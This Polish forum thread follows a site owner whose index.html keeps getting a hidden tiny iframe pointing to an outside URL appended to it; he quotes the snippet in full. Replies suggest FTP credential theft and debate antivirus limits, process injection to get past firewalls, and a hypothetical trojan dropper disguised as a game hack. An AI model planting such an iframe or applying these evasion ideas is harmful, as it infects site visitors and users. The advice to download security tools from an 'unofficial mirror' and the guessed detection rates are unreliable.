trojan js doklejany do pliku index.html

Cześć,

mam od pewnego czasu problem, mianowicie do mojego pliku index.html na moim serwerze doklejany jest następujący kod:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2
width=2 src=http://www.3dcgianimation.com/omzd.html?i=1387571></iframe>

Po usunięciu tego oczywiście to znów wraca. Na serwerze nic nie mam. Nie pali mi się zbyt, więc po pierwsze chciałbym zdiagnozować gdzie jest luka. Swojego kompa przeskanowałem, nic nie znaleziono. Korzystam z FileZilli. Rozważam zmianę haseł, pewnie zaraz to zrobię. Czy jest możliwość w DirectAdmninie sprawdzenie logów? Są jakieś logi Apache, ale tam widzę tylko odwołania GET do zasobów, a chodzi mi bardziej o rozpoznanie gdzie jest luka.

Wcześniej na serwerze miałem stronke z Django, teraz usunąłem...

Zmień hasło do FTP, jakiś syf siedzący na jednym z komputerów z którego logowano się na konto podwędził hasło i teraz wchodzi i dokleja malware.

I upewnij się, że faktycznie się tego pozbyłeś. Polecam skan przy pomocy Kaspersky Rescue Disk.
http://kasandra.4programmers.net/kaspersky/

(nieoficjalny mirror, bo widziałem malware który nawet instalki czegoś takiego ze znanych miejsc potrafił infekować :D)

Swojego kompa przeskanowałem, nic nie znaleziono

Nawet jeżeli to inny komp ma syfa, to AV jest niewiele wart, trojany powstają dosyć szybko, więc ich wykrywalność jest tak naprawdę niska (odważni mówią, że antywisury łapią tylko 5% zagrożeń (szczgóły tu, choć to naciągane, ale ja i tak bym określił tę wartość na ok 30%)). Sam spotkałem się z trzema trojanami (i pewnie więcej jak wliczać syf, który swego czasu był na uczelnianych komputerach), które do dziś nie są wykrywane.

Przede wszystkim to zmień hasła.

dzek69 napisał(a):

Sam spotkałem się z trzema trojanami (i pewnie więcej jak wliczać syf, który swego czasu był na uczelnianych komputerach), które do dziś nie są wykrywane.

A jak na komputerze ktoś ma Comodo Internet Security lub coś innego rozbudowanego, to powiadasz, że trojan bez problemu uzyska dostęp do netu, mimo, że Comodo ustawiony jest, by przy 100% programów (bez wyjątków), pytał, czy zezwolić na dostęp do netu tej aplikacji (z opcją zapamiętania)? A dodatkowo taka osoba monitoruje w Comodo procesy korzystające z netu (i te niekorzystające też). Wiresharka też można by dodać tak przy okazji.

A jak na komputerze ktoś ma Comodo Internet Security lub coś innego rozbudowanego, to powiadasz, że trojan bez problemu uzyska dostęp do netu, mimo, że Comodo ustawiony jest, by przy 100% programów (bez wyjątków), pytał, czy zezwolić na dostęp do netu tej aplikacji (z opcją zapamiętania)

No właśnie - z opcją zapamiętania. Najprostszy sposób na firewalla? Wstrzyknąć kod trojana w "zapamiętany" proces (tak jak np. ktoraś z przeglądarek).
Niestety taka prawda, że jak ktoś bardzo chce obejść AV to zawsze znajdzie sposób. Jednak spora część twórców malware'u jest po prostu zbyt leniwa lub zbyt głupia, żeby tworzyć swój "soft" od podstaw i po prostu modyfikuje stary malware. A to z kolei daje pole do popisu AV.
Jeżeli chodzi o tamten raport to liczba jest przekłamana - AV jest w stanie wykryć znacznie więcej niż 5% nieznanego malware'u.

0x200x20 napisał(a):

Najprostszy sposób na firewalla? Wstrzyknąć kod trojana w "zapamiętany" proces (tak jak np. któraś z przeglądarek).

tyle, że żeby cokolwiek wstrzyknąć, defense+ w Comodo musi pozwolić mu na to, a kto normalny pozwala na zaakceptowanie alertu typu "proces xyz próbuje uzyskać dostęp do procesu firefox.exe" czy gdzieś tam? Comodo nawet potrafi walić alert, jak coś woła dostępu do explorer.exe (czyli każda aplikacja, w której jest opcja przeglądania folderów, by wskazać ścieżkę).

Mi chodziło o to, że jest wykrywany jako zagrożenie/ wirus, nie jako kolejny program coś tam chcący od internetu.
Świadomy użytkownik zawsze był chroniony - mózgiem.
Ciężko mi jednak w codzienności spotkać kogoś z czymś innym niż:

• Avast
• Eset
• Coś, co było defaultowo z komputerem
  Firewall wywalający co chwila popupy stanie się irytujący po max 3 dniach dla większości użytkowników.

A twórcom trojanów absolutnie nie chodzi o to, żeby nieważne jakim kosztem - ale dostać się na 100% komputerów. Trojany są proste, na prostych ludzi z prostymi AV.

No i mnie nie trzeba edukować o Comodo czy innych firewallach - w końcu te 3 trojany zidentyfikowałem chociaż żaden AV (wg virustotal) ich nie wykrył ;)

Aha, co do opcji zezwalania na wstrzykiwanie. Nie kojarzę już jaki program wstrzykiwał jakiś kod, ale wiem, że gry typu multiplayer pod San Andres - wstrzykują kod w proces GTA - trzeba. Ja w swoim firewallu musiałem do tego wyłączać ochronę przed wstrzykiwaniem całkowicie - inaczej nie dało się uruchomić gry -> to już kolejna szansa, że nawet ktoś z zaawansowanym oprogramowaniem może nie być 100% chroniony.

dzek69 napisał(a):

Firewall wywalający co chwila popupy stanie się irytujący po max 3 dniach dla większości użytkowników.

z tym, że podczas instalacji zaufanych programów, na chwilę wchodzisz w tryb gry w firewallu/av i zero komunikatów, albo wybierasz opcję "potraktuj jako instalator/aktualizator", wtedy też zero na czas instalacji. A przy używaniu programu, to tylko raz cię zapyta o explorer.exe lub inny proces, zezwolisz zapamiętując wybór (bo ufasz niektórym programom wtedy, a przy niezaufanych byś zwracał uwagę na wszystko, no i komunikat może byłby inny, groźniejszy wtedy), ogólnie różne są sposoby i można mieć nieirytujący pakiet bezpieczeństwa, bezpieczny.

Dodam od siebie, że wczoraj na jednym forum z grami, ludzie założyli temat o antywirusy itd, jakich używają, 50% ludzi pisała tam posty w stylu "nie używam żadnego, używam MÓZGU, a to wystarczy" <- ci ludzie, czyli połowa użytkowników forum (tak uproszczając), to ofiary. Pozostali mieli zazwyczaj tylko antywirusy, albo coś w stylu avast, ESET, niektórzy kaspersky av (nie wiem ile z nich ma firewalla, może ludzie ci głównie samego AV używają uznając, że firewall im zbędny). Także ci z samym AV też mogą być ofiarami, bo skoro firewalla nie mają (ostatecznie mają jakiś, który ustawiony jest tak, by domyślnie przepuszczać 90% rzeczy automatycznie, by nie wkurzać alertami) to nie są zbyt ostrożni, nie wspominając o sprawdzeniu listy procesów, czy monitorowaniu netu.
Najbardziej mnie zaskoczyło to, że była spora ilość wpisów w topicu typu "używam mózgu, to najlepsza ochrona", aż żal mi się ich trochę zrobiło, skoro polegają tylko na sobie. Teoretycznie to gdybym chciał, napisałbym w dowolnym języku prosty program (jeden plik exe), który wygląda jak hack do gry MMO, ale w praktyce ze swojego exeka utworzyłby na dysku gdzie indziej plik exe z trojanem prostym i dodał odpowiednie wpisy do autostartu. Gracz odpali taki pseudo hack do gry, zobaczy, że nie działa, wyrzuci go i będzie myślał, że jest bezpieczny, bo skoro wywalił go, nic się nie stało złego, to nic groźnego nie ma na dysku i będzie w błędzie. Nie znam się na tym, ale teoretycznie tak mogłoby być.

4363462 napisał(a):

Dodam od siebie, że wczoraj na jednym forum z grami, ludzie założyli temat o antywirusy itd, jakich używają, 50% ludzi pisała tam posty w stylu "nie używam żadnego, używam MÓZGU, a to wystarczy" <- ci ludzie, czyli połowa użytkowników forum (tak uproszczając), to ofiary. Pozostali mieli zazwyczaj tylko antywirusy, albo coś w stylu avast, ESET, niektórzy kaspersky av (nie wiem ile z nich ma firewalla, może ludzie ci głównie samego AV używają uznając, że firewall im zbędny). Także ci z samym AV też mogą być ofiarami, bo skoro firewalla nie mają (ostatecznie mają jakiś, który ustawiony jest tak, by domyślnie przepuszczać 90% rzeczy automatycznie, by nie wkurzać alertami) to nie są zbyt ostrożni, nie wspominając o sprawdzeniu listy procesów, czy monitorowaniu netu.
Najbardziej mnie zaskoczyło to, że była spora ilość wpisów w topicu typu "używam mózgu, to najlepsza ochrona", aż żal mi się ich trochę zrobiło, skoro polegają tylko na sobie. Teoretycznie to gdybym chciał, napisałbym w dowolnym języku prosty program (jeden plik exe), który wygląda jak hack do gry MMO, ale w praktyce ze swojego exeka utworzyłby na dysku gdzie indziej plik exe z trojanem prostym i dodał odpowiednie wpisy do autostartu. Gracz odpali taki pseudo hack do gry, zobaczy, że nie działa, wyrzuci go i będzie myślał, że jest bezpieczny, bo skoro wywalił go, nic się nie stało złego, to nic groźnego nie ma na dysku i będzie w błędzie. Nie znam się na tym, ale teoretycznie tak mogłoby być.

właśnie ci używający mózgu wiedzą że najwięcej wirusów się kryje w crackach i "hackach" do gier
sam nie mam ani AV ani firewalla
znaczy mam - standardowy firewall windowsa i standardowy antywirus windowsa
nic mi się nie ma prawa wgrać bo autorun mam wyłączony, siedzę za routerem więc nie jestem wystawiony bezpośrednio do internetu, ciągle instaluję te same programy z tych samych sprawdzonych źródeł. Jak mam potrzebę uruchomić coś nieznanego to robię to w maszynie wirtualnej
i nie dodasz nic do autoruna bez pozwolenia UAC,a tylko idiota kliknąłby "tak" w takiej aplikacji